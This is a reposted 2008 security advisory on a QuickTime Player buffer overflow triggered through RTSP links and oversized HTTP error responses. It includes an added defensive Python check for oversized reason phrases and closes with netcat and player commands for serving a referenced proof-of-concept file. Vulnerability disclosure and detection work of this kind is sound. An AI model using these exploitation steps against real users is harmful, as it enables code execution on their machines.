
Friday, January 11, 2008

[NT] Quicktime Player Buffer Overflow (LCD, RTSP)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - - - - - - - -

Quicktime Player Buffer Overflow (LCD, RTSP)
------------------------------------------------------------------------


SUMMARY

<http://www.apple.com/quicktime> Quicktime is "a well known media player
developed by Apple". QuickTime appears to contain a buffer overflow that
is triggered while filling the LCD-like screen with information about
the status of the connection.

DETAILS

Vulnerable Systems:
* Quicktime Player versions 7.3.1.70 and prior

Exploiting this vulnerability only requires that a user follows an
rtsp:// link. If port 554 on the server is closed, QuickTime automatically
switches transport and retries over HTTP on port 80; the server's 404
error message (other error codes work as well) is then displayed in the
LCD-like screen.

During Luigi's tests he was able to fully overwrite the return address.
Note, however, that the visible effects of the vulnerability may change
when the player is run under a debugger (attaching the debugger to the
already running process works fine).
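Added example, not part of the advisory: a defender-side check of the kind a proxy or IDS rule might apply to the HTTP response the player receives after falling back from RTSP, flagging a status line whose reason phrase is oversized or carries non-printable filler bytes. The length limit and both sample responses are constructed for illustration.

```python
import re

# Constructed sample responses (illustration only, not the advisory's PoC):
# a benign 404 and one whose reason phrase is thousands of filler bytes,
# the shape a fixed-size status display cannot safely hold.
NORMAL_404 = b"HTTP/1.1 404 Not Found\r\nContent-Length: 0\r\n\r\n"
OVERSIZED_404 = b"HTTP/1.1 404 " + b"\x01" * 1400 + b"A" * 1600 + b"xy\r\n\r\n"

MAX_REASON_LEN = 128  # hypothetical policy limit; HTTP itself sets no bound

STATUS_LINE_RE = re.compile(rb"HTTP/\d\.\d (\d{3})(?: (.*))?$", re.DOTALL)


def check_status_line(response: bytes, max_reason_len: int = MAX_REASON_LEN) -> dict:
    """Parse the first line of an HTTP response and list why it looks suspicious.

    Returns a dict with 'parsed' (bool), 'status' and 'reason_len' when the
    status line parses, plus 'findings' (empty for a benign response).
    """
    line, crlf, _rest = response.partition(b"\r\n")
    findings = []
    if not crlf:
        findings.append("no CRLF terminating status line")
    m = STATUS_LINE_RE.match(line)
    if not m:
        findings.append("malformed status line")
        return {"parsed": False, "findings": findings}
    reason = m.group(2) or b""
    if len(reason) > max_reason_len:
        findings.append(f"reason phrase is {len(reason)} bytes, limit {max_reason_len}")
    # Filler such as 0x01 or raw high bytes never belongs in a reason phrase.
    nonprintable = sum(1 for b in reason if b < 0x20 or b > 0x7E)
    if nonprintable:
        findings.append(f"{nonprintable} non-printable bytes in reason phrase")
    return {
        "parsed": True,
        "status": int(m.group(1)),
        "reason_len": len(reason),
        "findings": findings,
    }


if __name__ == "__main__":
    for label, resp in (("normal", NORMAL_404), ("oversized", OVERSIZED_404)):
        print(label, check_status_line(resp))
```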

Exploit:
(content of <http://aluigi.org/poc/quicktimebof.txt>)

Use it with:
nc -l -p 80 -v -v -n < quicktimebof.txt

and then run:
QuickTimePlayer.exe rtsp://127.0.0.1/file.mp3


ADDITIONAL INFORMATION

The information has been provided by <mailto:aluigi@autistici.org> Luigi Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/quicktimebof-adv.txt>
